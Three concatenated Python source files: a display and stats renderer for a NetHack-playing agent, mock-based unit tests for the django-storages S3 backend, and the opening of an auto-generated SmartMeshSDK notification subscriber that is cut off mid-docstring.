def stop_display_thread(self):
if self.show:
self._display_process.terminate()
self._display_process.join()
def _display_thread(self):
cv2.namedWindow(self._window_name, cv2.WINDOW_NORMAL | cv2.WINDOW_GUI_NORMAL)
last_size = (None, None)
image = None
while 1:
is_new_image = False
try:
while 1:
try:
image = self._display_queue.get(timeout=0.03)
is_new_image = True
except queue.Empty:
break
if image is None:
image = self._display_queue.get()
is_new_image = True
width = cv2.getWindowImageRect(self._window_name)[2]
height = cv2.getWindowImageRect(self._window_name)[3]
ratio = min(width / image.shape[1], height / image.shape[0])
width, height = round(image.shape[1] * ratio), round(image.shape[0] * ratio)
if last_size != (width, height) or is_new_image:
last_size = (width, height)
                    resized_image = cv2.resize(image, (width, height), interpolation=cv2.INTER_AREA)
cv2.imshow(self._window_name, resized_image)
cv2.waitKey(1)
except KeyboardInterrupt:
pass
except (ConnectionResetError, EOFError):
return
cv2.destroyWindow(self._window_name)
def _start_display_thread(self):
if self.show:
self._display_queue = multiprocessing.Manager().Queue()
self._display_process = multiprocessing.Process(target=self._display_thread, daemon=False)
self._display_process.start()
def _update_dynamic_frame_skipping(self, render_start_time):
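        # Descriptive note: render and agent times are tracked as exponential
        # moving averages, ema = alpha * ema + (1 - alpha) * sample, with
        # alpha = min(0.95, 1 - 1 / (step_count + 1)); _render() then skips
        # frames while frame_counter <= render_ema / agent_ema / threshold.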
if self._dynamic_frame_skipping_last_end_time is not None:
self.total_time += time.time() - self._dynamic_frame_skipping_last_end_time
if render_start_time is not None:
render_time = time.time() - render_start_time
else:
render_time = None
agent_time = time.time() - self._dynamic_frame_skipping_last_end_time - \
(render_time if render_time is not None else 0)
if render_start_time is not None:
self._dynamic_frame_skipping_render_time = \
self._dynamic_frame_skipping_render_time * self._dynamic_frame_skipping_exp() + \
render_time * (1 - self._dynamic_frame_skipping_exp())
self._dynamic_frame_skipping_agent_time = \
self._dynamic_frame_skipping_agent_time * self._dynamic_frame_skipping_exp() + \
agent_time * (1 - self._dynamic_frame_skipping_exp())
self._dynamic_frame_skipping_last_end_time = time.time()
def _draw_bottombar(self, width):
height = FONT_SIZE * len(self.last_obs['tty_chars'])
tty = self._draw_tty(self.last_obs, width - width // 2, height)
stats = self._draw_stats(width // 2, height)
return np.concatenate([tty, stats], axis=1)
def _draw_stats(self, width, height):
ret = np.zeros((height, width, 3), dtype=np.uint8)
ch = self.env.agent.character
if ch.role is None:
return ret
# game info
i = 0
txt = [f'Level num: {self.env.agent.current_level().level_number}',
f'Dung num: {self.env.agent.current_level().dungeon_number}',
f'Step: {self.env.step_count}',
f'Turn: {self.env.agent._last_turn}',
f'Score: {self.env.score}',
]
put_text(ret, ' | '.join(txt), (0, i * FONT_SIZE), color=(255, 255, 255))
i += 3
# general character info
txt = [
{v: k for k, v in ch.name_to_role.items()}[ch.role],
{v: k for k, v in ch.name_to_race.items()}[ch.race],
{v: k for k, v in ch.name_to_alignment.items()}[ch.alignment],
{v: k for k, v in ch.name_to_gender.items()}[ch.gender],
]
put_text(ret, ' | '.join(txt), (0, i * FONT_SIZE))
i += 1
txt = [f'HP: {self.env.agent.blstats.hitpoints} / {self.env.agent.blstats.max_hitpoints}',
f'LVL: {self.env.agent.blstats.experience_level}',
f'ENERGY: {self.env.agent.blstats.energy} / {self.env.agent.blstats.max_energy}',
]
hp_ratio = self.env.agent.blstats.hitpoints / self.env.agent.blstats.max_hitpoints
hp_color = cv2.applyColorMap(np.array([[130 - int((1 - hp_ratio) * 110)]], dtype=np.uint8),
cv2.COLORMAP_TURBO)[0, 0]
put_text(ret, ' | '.join(txt), (0, i * FONT_SIZE), color=tuple(map(int, hp_color)))
i += 2
# proficiency info
colors = {
'Basic': (100, 100, 255),
'Skilled': (100, 255, 100),
'Expert': (100, 255, 255),
'Master': (255, 255, 100),
'Grand Master': (255, 100, 100),
}
for line in ch.get_skill_str_list():
if 'Unskilled' not in line:
put_text(ret, line, (0, i * FONT_SIZE), color=colors[line.split('-')[-1]])
i += 1
unskilled = []
for line in ch.get_skill_str_list():
if 'Unskilled' in line:
unskilled.append(line.split('-')[0])
put_text(ret, '|'.join(unskilled), (0, i * FONT_SIZE), color=(100, 100, 100))
i += 2
put_text(ret, 'Unarmed bonus: ' + str(ch.get_melee_bonus(None)), (0, i * FONT_SIZE))
i += 2
stats = list(self.env.agent.stats_logger.get_stats_dict().items())
stats = [(k, v) for k, v in stats if v != 0]
for j in range((len(stats) + 2) // 3):
def format_value(v):
if isinstance(v, float):
return f'{v:.2f}'
return str(v)
put_text(ret, ' | '.join(f'{k}={format_value(v)}' for k, v in stats[j * 3: (j + 1) * 3]),
(0, i * FONT_SIZE), color=(100, 100, 100))
i += 1
i += 1
if hasattr(self.env.agent.character, 'known_spells'):
put_text(ret, 'Known spells: ' + str(list(self.env.agent.character.known_spells)), (0, i * FONT_SIZE))
i += 1
monsters = [(dis, y, x, mon.mname) for dis, y, x, mon, _ in self.env.agent.get_visible_monsters()]
put_text(ret, 'Monsters: ' + str(monsters), (0, i * FONT_SIZE))
draw_frame(ret)
return ret
def _draw_topbar(self, width):
actions_vis = self._draw_action_history(width // 25)
messages_vis = self._draw_message_history(width // 4)
popup_vis = self._draw_popup_history(width // 4)
log_messages_vis = self._draw_debug_message_log(width - width // 25 - width // 4 - width // 4)
ret = np.concatenate([actions_vis, messages_vis, popup_vis, log_messages_vis], axis=1)
assert ret.shape[1] == width
return ret
def _draw_debug_message_log(self, width):
vis = np.zeros((FONT_SIZE * HISTORY_SIZE, width, 3)).astype(np.uint8)
for i in range(HISTORY_SIZE):
if i >= len(self.log_messages_history):
break
txt = self.log_messages_history[-i - 1]
if i == 0:
put_text(vis, txt, (0, i * FONT_SIZE), color=(255, 255, 255))
else:
put_text(vis, txt, (0, i * FONT_SIZE), color=(120, 120, 120))
draw_frame(vis)
return vis
def _update_log_message_history(self):
txt = ''
if self.env.agent is not None:
txt = ' | '.join(self.log_messages)
# if txt:
self.log_messages_history.append(txt)
def _draw_action_history(self, width):
vis = np.zeros((FONT_SIZE * HISTORY_SIZE, width, 3)).astype(np.uint8)
for i in range(HISTORY_SIZE):
if i >= len(self.action_history):
break
txt = self.action_history[-i - 1]
if i == 0:
put_text(vis, txt, (0, i * FONT_SIZE), color=(255, 255, 255))
else:
put_text(vis, txt, (0, i * FONT_SIZE), color=(120, 120, 120))
draw_frame(vis)
return vis
def _draw_message_history(self, width):
messages_vis = np.zeros((FONT_SIZE * HISTORY_SIZE, width, 3)).astype(np.uint8)
for i in range(HISTORY_SIZE):
if i >= len(self.message_history):
break
txt = self.message_history[-i - 1]
if i == 0:
put_text(messages_vis, txt, (0, i * FONT_SIZE), color=(255, 255, 255))
else:
put_text(messages_vis, txt, (0, i * FONT_SIZE), color=(120, 120, 120))
draw_frame(messages_vis)
return messages_vis
def _draw_popup_history(self, width):
messages_vis = np.zeros((FONT_SIZE * HISTORY_SIZE, width, 3)).astype(np.uint8)
for i in range(HISTORY_SIZE):
if i >= len(self.popup_history):
break
txt = '|'.join(self.popup_history[-i - 1])
if i == 0:
put_text(messages_vis, txt, (0, i * FONT_SIZE), color=(255, 255, 255))
else:
put_text(messages_vis, txt, (0, i * FONT_SIZE), color=(120, 120, 120))
draw_frame(messages_vis)
return messages_vis
def _update_message_history(self):
txt = ''
if self.env.agent is not None:
txt = self.env.agent.message
# if txt:
self.message_history.append(txt)
def _update_popup_history(self):
txt = ''
if self.env.agent is not None:
txt = self.env.agent.popup
# if txt:
self.popup_history.append(txt)
def _draw_tty(self, obs, width, height):
vis = np.zeros((int(height * self.tty_downscale),
int(width * self.tty_downscale), 3)).astype(np.uint8)
vis = Image.fromarray(vis)
draw = ImageDraw.Draw(vis)
for i, line in enumerate(obs['tty_chars']):
txt = ''.join([chr(i) for i in line])
draw.text((int(5 * self.tty_downscale), int((5 + i * 31) * self.tty_downscale)),
txt, (255, 255, 255), font=self.font)
vis = np.array(vis.resize((width, height), Image.ANTIALIAS))
draw_frame(vis)
return vis
def _draw_item(self, letter, item, width, height, indent=0):
from ..item import Item
bg_color = {
nh.WAND_CLASS: np.array([0, 50, 50], dtype=np.uint8),
nh.FOOD_CLASS: np.array([0, 50, 0], dtype=np.uint8),
nh.ARMOR_CLASS: np.array([50, 50, 0], dtype=np.uint8),
nh.RING_CLASS: np.array([50, 50, 0], dtype=np.uint8),
nh.SCROLL_CLASS: np.array([30, 30, 30], dtype=np.uint8),
nh.POTION_CLASS: np.array([0, 0, 50], dtype=np.uint8),
}
indent = int((width - 1) * (1 - 0.9 ** indent))
vis = np.zeros((round(height * 0.9), width - indent, 3)).astype(np.uint8)
if item.category in bg_color:
vis += bg_color[item.category]
if item.is_weapon():
if item.is_thrown_projectile() or item.is_fired_projectile():
vis += np.array([50, 0, 50], dtype=np.uint8)
else:
vis += np.array([50, 0, 0], dtype=np.uint8)
if letter is not None:
put_text(vis, str(letter), (0, 0))
status_str, status_col = {
Item.UNKNOWN: (' ', (255, 255, 255)),
Item.CURSED: ('C', (255, 0, 0)),
Item.UNCURSED: ('U', (0, 255, 255)),
Item.BLESSED: ('B', (0, 255, 0)),
}[item.status]
put_text(vis, status_str, (FONT_SIZE, 0), color=status_col)
if item.modifier is not None:
put_text(vis, str(item.modifier), (FONT_SIZE * 2, 0))
best_launcher, best_ammo = self.env.agent.inventory.get_best_ranged_set()
best_melee = self.env.agent.inventory.get_best_melee_weapon()
if item == best_launcher:
put_text(vis, 'L', (FONT_SIZE * 3, 0), color=(255, 255, 255))
if item == best_ammo:
put_text(vis, 'A', (FONT_SIZE * 3, 0), color=(255, 255, 255))
if item == best_melee:
put_text(vis, 'M', (FONT_SIZE * 3, 0), color=(255, 255, 255))
if item.is_weapon():
put_text(vis, str(self.env.agent.character.get_melee_bonus(item)), (FONT_SIZE * 4, 0))
put_text(vis, str(item), (FONT_SIZE * 8, round(FONT_SIZE * -0.1)), scale=FONT_SIZE / 40)
# if len(item.objs) > 1:
vis = np.concatenate([vis, np.zeros((vis.shape[0] // 2, vis.shape[1], 3), dtype=np.uint8)])
put_text(vis, str(len(item.objs)) + ' | ' + ' | '.join((o.name for o in item.objs)),
(0, round(FONT_SIZE * 0.8)), scale=FONT_SIZE / 40)
draw_frame(vis, color=(80, 80, 80), thickness=2)
if item.equipped:
cv2.rectangle(vis, (0, 0), (int(FONT_SIZE * 1.4), vis.shape[0] - 1), (0, 255, 255), 6)
if indent != 0:
vis = np.concatenate([np.zeros((vis.shape[0], width - vis.shape[1], 3), dtype=np.uint8), vis], 1)
return vis
def _draw_inventory(self, height):
width = 800
vis = np.zeros((height, width, 3), dtype=np.uint8)
if self.env.agent:
item_h = round(FONT_SIZE * 1.4)
tiles = []
for i, (letter, item) in enumerate(zip(self.env.agent.inventory.items.all_letters,
self.env.agent.inventory.items.all_items)):
def rec_draw(item, letter, indent=0):
tiles.append(self._draw_item(letter, item, width, item_h, indent=indent))
if item.is_container():
for it in item.content:
rec_draw(it, None, indent + 1)
rec_draw(item, letter, 0)
if tiles:
vis = np.concatenate(tiles, axis=0)
if vis.shape[0] < height:
vis = np.concatenate([vis, np.zeros((height - vis.shape[0], width, 3), dtype=np.uint8)], axis=0)
else:
vis = cv2.resize(vis, (width, height))
draw_frame(vis)
return vis
|
test_s3boto3.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import gzip
import pickle
import threading
import warnings
from datetime import datetime
from unittest import skipIf
from botocore.exceptions import ClientError
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.base import ContentFile
from django.test import TestCase, override_settings
from django.utils.six.moves.urllib import parse as urlparse
from django.utils.timezone import is_aware, utc
from storages.backends import s3boto3
try:
from unittest import mock
except ImportError: # Python 3.2 and below
import mock
class S3Boto3TestCase(TestCase):
def setUp(self):
self.storage = s3boto3.S3Boto3Storage()
self.storage._connections.connection = mock.MagicMock()
class S3Boto3StorageTests(S3Boto3TestCase):
def test_clean_name(self):
"""
Test the base case of _clean_name
"""
path = self.storage._clean_name("path/to/somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_clean_name_normalize(self):
"""
Test the normalization of _clean_name
"""
path = self.storage._clean_name("path/to/../somewhere")
self.assertEqual(path, "path/somewhere")
def test_clean_name_trailing_slash(self):
"""
Test the _clean_name when the path has a trailing slash
"""
path = self.storage._clean_name("path/to/somewhere/")
self.assertEqual(path, "path/to/somewhere/")
def test_clean_name_windows(self):
"""
Test the _clean_name when the path has a trailing slash
"""
path = self.storage._clean_name("path\\to\\somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_pickle_with_bucket(self):
"""
Test that the storage can be pickled with a bucket attached
"""
# Ensure the bucket has been used
self.storage.bucket
self.assertIsNotNone(self.storage._bucket)
# Can't pickle MagicMock, but you can't pickle a real Bucket object either
p = pickle.dumps(self.storage)
new_storage = pickle.loads(p)
self.assertIsInstance(new_storage._connections, threading.local)
# Put the mock connection back in
new_storage._connections.connection = mock.MagicMock()
self.assertIsNone(new_storage._bucket)
new_storage.bucket
self.assertIsNotNone(new_storage._bucket)
def test_pickle_without_bucket(self):
"""
Test that the storage can be pickled, without a bucket instance
"""
# Can't pickle a threadlocal
p = pickle.dumps(self.storage)
new_storage = pickle.loads(p)
self.assertIsInstance(new_storage._connections, threading.local)
def test_storage_url_slashes(self):
"""
Test URL generation.
"""
self.storage.custom_domain = 'example.com'
# We expect no leading slashes in the path,
# and trailing slashes should be preserved.
self.assertEqual(self.storage.url(''), 'https://example.com/')
self.assertEqual(self.storage.url('path'), 'https://example.com/path')
self.assertEqual(self.storage.url('path/'), 'https://example.com/path/')
self.assertEqual(self.storage.url('path/1'), 'https://example.com/path/1')
self.assertEqual(self.storage.url('path/1/'), 'https://example.com/path/1/')
def test_storage_save(self):
"""
Test saving a file
"""
name = 'test_storage_save.txt'
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'text/plain',
'ACL': self.storage.default_acl,
}
)
def test_storage_save_with_acl(self):
"""
Test saving a file with user defined ACL.
"""
name = 'test_storage_save.txt'
content = ContentFile('new content')
self.storage.default_acl = 'private'
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'text/plain',
'ACL': 'private',
}
)
def test_content_type(self):
"""
Test saving a file with a None content type.
"""
name = 'test_image.jpg'
content = ContentFile('data')
content.content_type = None
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'image/jpeg',
'ACL': self.storage.default_acl,
}
)
def test_storage_save_gzipped(self):
"""
Test saving a gzipped file
"""
name = 'test_storage_save.gz'
content = ContentFile("I am gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'application/octet-stream',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
def test_storage_save_gzip(self):
"""
Test saving a file with gzip enabled.
"""
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_storage_save_gzip_twice(self):
"""
Test saving the same file content twice with gzip enabled.
"""
# Given
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
# When
self.storage.save(name, content)
self.storage.save('test_storage_save_2.css', content)
# Then
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_compress_content_len(self):
"""
Test that file returned by _compress_content() is readable.
"""
self.storage.gzip = True
content = ContentFile("I should be gzip'd")
content = self.storage._compress_content(content)
self.assertTrue(len(content.read()) > 0)
def test_storage_open_write(self):
"""
Test opening a file in write mode
"""
name = 'test_open_for_writïng.txt'
content = 'new content'
# Set the encryption flag used for multipart uploads
self.storage.encryption = True
self.storage.reduced_redundancy = True
self.storage.default_acl = 'public-read'
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
file.write(content)
obj.initiate_multipart_upload.assert_called_with(
ACL='public-read',
ContentType='text/plain',
ServerSideEncryption='AES256',
StorageClass='REDUCED_REDUNDANCY'
)
# Save the internal file before closing
multipart = obj.initiate_multipart_upload.return_value
multipart.parts.all.return_value = [mock.MagicMock(e_tag='123', part_number=1)]
file.close()
multipart.Part.assert_called_with(1)
part = multipart.Part.return_value
part.upload.assert_called_with(Body=content.encode('utf-8'))
multipart.complete.assert_called_once_with(
MultipartUpload={'Parts': [{'ETag': '123', 'PartNumber': 1}]})
def test_storage_write_beyond_buffer_size(self):
"""
Test writing content that exceeds the buffer size
"""
name = 'test_open_for_writïng_beyond_buffer_size.txt'
# Set the encryption flag used for multipart uploads
self.storage.encryption = True
self.storage.reduced_redundancy = True
self.storage.default_acl = 'public-read'
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
# Initiate the multipart upload
file.write('')
obj.initiate_multipart_upload.assert_called_with(
ACL='public-read',
ContentType='text/plain',
ServerSideEncryption='AES256',
StorageClass='REDUCED_REDUNDANCY'
)
multipart = obj.initiate_multipart_upload.return_value
# Write content at least twice as long as the buffer size
written_content = ''
counter = 1
while len(written_content) < 2 * file.buffer_size:
content = 'hello, aws {counter}\n'.format(counter=counter)
# Write more than just a few bytes in each iteration to keep the
# test reasonably fast
content += '*' * int(file.buffer_size / 10)
file.write(content)
written_content += content
counter += 1
# Save the internal file before closing
multipart.parts.all.return_value = [
mock.MagicMock(e_tag='123', part_number=1),
mock.MagicMock(e_tag='456', part_number=2)
]
file.close()
self.assertListEqual(
multipart.Part.call_args_list,
[mock.call(1), mock.call(2)]
)
part = multipart.Part.return_value
uploaded_content = ''.join(
(args_list[1]['Body'].decode('utf-8')
for args_list in part.upload.call_args_list)
)
self.assertEqual(uploaded_content, written_content)
multipart.complete.assert_called_once_with(
MultipartUpload={'Parts': [
{'ETag': '123', 'PartNumber': 1},
{'ETag': '456', 'PartNumber': 2},
]}
)
def test_auto_creating_bucket(self):
self.storage.auto_create_bucket = True
Bucket = mock.MagicMock()
self.storage._connections.connection.Bucket.return_value = Bucket
self.storage._connections.connection.meta.client.meta.region_name = 'sa-east-1'
Bucket.meta.client.head_bucket.side_effect = ClientError({'Error': {},
'ResponseMetadata': {'HTTPStatusCode': 404}},
'head_bucket')
self.storage._get_or_create_bucket('testbucketname')
Bucket.create.assert_called_once_with(
ACL='public-read',
CreateBucketConfiguration={
'LocationConstraint': 'sa-east-1',
}
)
def test_auto_creating_bucket_with_acl(self):
self.storage.auto_create_bucket = True
self.storage.bucket_acl = 'public-read'
Bucket = mock.MagicMock()
self.storage._connections.connection.Bucket.return_value = Bucket
self.storage._connections.connection.meta.client.meta.region_name = 'sa-east-1'
Bucket.meta.client.head_bucket.side_effect = ClientError({'Error': {},
'ResponseMetadata': {'HTTPStatusCode': 404}},
'head_bucket')
self.storage._get_or_create_bucket('testbucketname')
Bucket.create.assert_called_once_with(
ACL='public-read',
CreateBucketConfiguration={
'LocationConstraint': 'sa-east-1',
}
)
def test_storage_exists(self):
self.assertTrue(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key="file.txt",
)
def test_storage_exists_false(self):
self.storage.connection.meta.client.head_object.side_effect = ClientError(
{'Error': {'Code': '404', 'Message': 'Not Found'}},
'HeadObject',
)
self.assertFalse(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key='file.txt',
)
def test_storage_exists_doesnt_create_bucket(self):
with mock.patch.object(self.storage, '_get_or_create_bucket') as method:
self.storage.exists('file.txt')
self.assertFalse(method.called)
def test_storage_delete(self):
self.storage.delete("path/to/file.txt")
self.storage.bucket.Object.assert_called_with('path/to/file.txt')
self.storage.bucket.Object.return_value.delete.assert_called_with()
def test_storage_listdir_base(self):
# Files:
# some/path/1.txt
# 2.txt
# other/path/3.txt
# 4.txt
pages = [
{
'CommonPrefixes': [
{'Prefix': 'some'},
{'Prefix': 'other'},
],
'Contents': [
{'Key': '2.txt'},
{'Key': '4.txt'},
],
},
]
paginator = mock.MagicMock()
paginator.paginate.return_value = pages
self.storage._connections.connection.meta.client.get_paginator.return_value = paginator
dirs, files = self.storage.listdir('')
paginator.paginate.assert_called_with(Bucket=None, Delimiter='/', Prefix='')
self.assertEqual(dirs, ['some', 'other'])
self.assertEqual(files, ['2.txt', '4.txt'])
def test_storage_listdir_subdir(self):
# Files:
# some/path/1.txt
# some/2.txt
pages = [
{
'CommonPrefixes': [
{'Prefix': 'some/path'},
],
'Contents': [
{'Key': 'some/2.txt'},
],
},
]
paginator = mock.MagicMock()
paginator.paginate.return_value = pages
self.storage._connections.connection.meta.client.get_paginator.return_value = paginator
dirs, files = self.storage.listdir('some/')
paginator.paginate.assert_called_with(Bucket=None, Delimiter='/', Prefix='some/')
self.assertEqual(dirs, ['path'])
self.assertEqual(files, ['2.txt'])
def test_storage_size(self):
obj = self.storage.bucket.Object.return_value
obj.content_length = 4098
name = 'file.txt'
self.assertEqual(self.storage.size(name), obj.content_length)
def test_storage_mtime(self):
# Test both USE_TZ cases
for use_tz in (True, False):
with self.settings(USE_TZ=use_tz):
self._test_storage_mtime(use_tz)
def _test_storage_mtime(self, use_tz):
obj = self.storage.bucket.Object.return_value
obj.last_modified = datetime.now(utc)
name = 'file.txt'
self.assertFalse(
is_aware(self.storage.modified_time(name)),
'Naive datetime object expected from modified_time()'
)
self.assertIs(
settings.USE_TZ,
is_aware(self.storage.get_modified_time(name)),
'%s datetime object expected from get_modified_time() when USE_TZ=%s' % (
('Naive', 'Aware')[settings.USE_TZ],
settings.USE_TZ
)
)
def test_storage_url(self):
name = 'test_storage_size.txt'
url = 'http://aws.amazon.com/%s' % name
self.storage.bucket.meta.client.generate_presigned_url.return_value = url
self.storage.bucket.name = 'bucket'
self.assertEqual(self.storage.url(name), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=self.storage.querystring_expire
)
custom_expire = 123
self.assertEqual(self.storage.url(name, expire=custom_expire), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=custom_expire
)
def test_generated_url_is_encoded(self):
self.storage.custom_domain = "mock.cloudfront.net"
filename = "whacky & filename.mp4"
url = self.storage.url(filename)
parsed_url = urlparse.urlparse(url)
self.assertEqual(parsed_url.path,
"/whacky%20%26%20filename.mp4")
self.assertFalse(self.storage.bucket.meta.client.generate_presigned_url.called)
def test_special_characters(self):
self.storage.custom_domain = "mock.cloudfront.net"
name = "ãlöhâ.jpg"
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
url = self.storage.url(name)
parsed_url = urlparse.urlparse(url)
self.assertEqual(parsed_url.path, "/%C3%A3l%C3%B6h%C3%A2.jpg")
def test_strip_signing_parameters(self):
expected = 'http://bucket.s3-aws-region.amazonaws.com/foo/bar'
self.assertEqual(self.storage._strip_signing_parameters(
'%s?X-Amz-Date=12345678&X-Amz-Signature=Signature' % expected), expected)
self.assertEqual(self.storage._strip_signing_parameters(
'%s?expires=12345678&signature=Signature' % expected), expected)
@skipIf(threading is None, 'Test requires threading')
def test_connection_threading(self):
connections = []
def thread_storage_connection():
connections.append(self.storage.connection)
for x in range(2):
t = threading.Thread(target=thread_storage_connection)
t.start()
t.join()
# Connection for each thread needs to be unique
self.assertIsNot(connections[0], connections[1])
def test_location_leading_slash(self):
msg = (
"S3Boto3Storage.location cannot begin with a leading slash. "
"Found '/'. Use '' instead."
)
with self.assertRaises(ImproperlyConfigured, msg=msg):
s3boto3.S3Boto3Storage(location='/')
def test_deprecated_acl(self):
with override_settings(AWS_DEFAULT_ACL=None), warnings.catch_warnings(record=True) as w:
s3boto3.S3Boto3Storage(acl='private')
assert len(w) == 1
assert issubclass(w[-1].category, DeprecationWarning)
message = (
"The acl argument of S3Boto3Storage is deprecated. Use argument "
"default_acl or setting AWS_DEFAULT_ACL instead. The acl argument "
"will be removed in version 2.0."
)
assert str(w[-1].message) == message
def test_deprecated_bucket(self):
with override_settings(AWS_DEFAULT_ACL=None), warnings.catch_warnings(record=True) as w:
s3boto3.S3Boto3Storage(bucket='django')
assert len(w) == 1
assert issubclass(w[-1].category, DeprecationWarning)
message = (
"The bucket argument of S3Boto3Storage is deprecated. Use argument "
"bucket_name or setting AWS_STORAGE_BUCKET_NAME instead. The bucket "
"argument will be removed in version 2.0."
)
assert str(w[-1].message) == message
def test_deprecated_default_acl(self):
with warnings.catch_warnings(record=True) as w:
s3boto3.S3Boto3Storage()
assert len(w) == 1
message = (
"The default behavior of S3Boto3Storage is insecure and will change "
"in django-storages 2.0. By default files and new buckets are saved "
"with an ACL of 'public-read' (globally publicly readable). Version 2.0 will "
"default to using the bucket's ACL. To opt into the new behavior set "
"AWS_DEFAULT_ACL = None, otherwise to silence this warning explicitly "
"set AWS_DEFAULT_ACL."
)
assert str(w[-1].message) == message
def test_deprecated_default_acl_override_class_variable(self):
class MyStorage(s3boto3.S3Boto3Storage):
default_acl = "private"
with warnings.catch_warnings(record=True) as w:
MyStorage()
assert len(w) == 0
|
IpMgrSubscribe.py
|
# Warning: Do NOT edit this file directly. Your changes may be overwritten.
# This file is automatically generated by GenIpMgrSubscribe.py
import threading
from SmartMeshSDK import ApiException
class IpMgrSubscribe(object):
'''
\brief Notification listener for IpMgrConnectorMux object
'''
class SubscribeError(Exception) :
def __init__(self, msg) :
self.msg = msg
def __str__(self):
return self.msg
ERROR = "error"
FINISH = "finish"
NOTIFEVENT = "notifEvent"
NOTIFLOG = "notifLog"
NOTIFDATA = "notifData"
NOTIFIPDATA = "notifIpData"
NOTIFHEALTHREPORT = "notifHealthReport"
ALLNOTIF = [NOTIFEVENT, NOTIFLOG, NOTIFDATA, NOTIFIPDATA, NOTIFHEALTHREPORT]
EVENTMOTERESET = "eventMoteReset"
EVENTNETWORKRESET = "eventNetworkReset"
EVENTCOMMANDFINISHED = "eventCommandFinished"
EVENTMOTEJOIN = "eventMoteJoin"
EVENTMOTEOPERATIONAL = "eventMoteOperational"
EVENTMOTELOST = "eventMoteLost"
EVENTNETWORKTIME = "eventNetworkTime"
EVENTPINGRESPONSE = "eventPingResponse"
EVENTPATHCREATE = "eventPathCreate"
EVENTPATHDELETE = "eventPathDelete"
EVENTPACKETSENT = "eventPacketSent"
EVENTMOTECREATE = "eventMoteCreate"
EVENTMOTEDELETE = "eventMoteDelete"
_trNotifNameTable = {
"eventMoteReset" : "notifEvent",
"eventNetworkReset" : "notifEvent",
"eventCommandFinished" : "notifEvent",
"eventMoteJoin" : "notifEvent",
"eventMoteOperational" : "notifEvent",
"eventMoteLost" : "notifEvent",
"eventNetworkTime" : "notifEvent",
"eventPingResponse" : "notifEvent",
"eventPathCreate" : "notifEvent",
"eventPathDelete" : "notifEvent",
"eventPacketSent" : "notifEvent",
"eventMoteCreate" : "notifEvent",
"eventMoteDelete" : "notifEvent",
}
#======================== public ==========================================
def __init__(self, ipMgrConnector) :
# Structure of self._callback :
# Notification Name :
        # [0] - subscription mask,
# [1] - cb-function. Notification is subscribed if [1]!=None,
# [2] - transport for notification: True - reliable, false - unreliable
self._callback = {
self.ERROR : [0x00, None, True],
self.FINISH : [0x00, None, True],
self.NOTIFEVENT : [0x02, None, True],
self.NOTIFLOG : [0x04, None, True],
self.NOTIFDATA : [0x10, None, True],
self.NOTIFIPDATA : [0x20, None, True],
self.NOTIFHEALTHREPORT : [0x40, None, True],
}
self._con = ipMgrConnector
self._thread = None
self._mask = self._unrlblMask = 0
self._isStarted = False
self._lock = threading.Lock()
def start(self):
'''
\brief Start the subscriber _thread.
'''
        if self._thread:  # wait for a previous disconnect to finish
try :
self._thread.join(1.0)
if self._thread.isAlive() :
raise ApiException.ConnectionError("Already connected")
except RuntimeError :
pass # Ignore join error
self._thread = None
# Clear _callback table
for i in self._callback :
self._callback[i][1] = None
self._callback[i][2] = True
self._mask = self._unrlblMask = 0
self._thread = threading.Thread(target = self._process)
self._thread.name = "IpMgrSubscribe"
self._thread.start()
self._isStarted = True
def subscribe(self, notifTypes, fun, isRlbl):
'''
\brief Subscribe to notification(s).
Calling this function multiple times will not cancel the effects of
the previous calls.
\pre Call start() before calling this function.
\param notifTypes Type(s) of notification(s) to subscribe to. This can
be a single string (when subscribing to a single notification), or
a list of strings (when subscribing to multiple notifications).
The list of possible types is:
ERROR, FINISH, NOTIFEVENT, NOTIFLOG, NOTIFDATA, NOTIFIPDATA, NOTIFHEALTHREPORT, ALLNOTIF
\param fun The function to call when any of the notification types
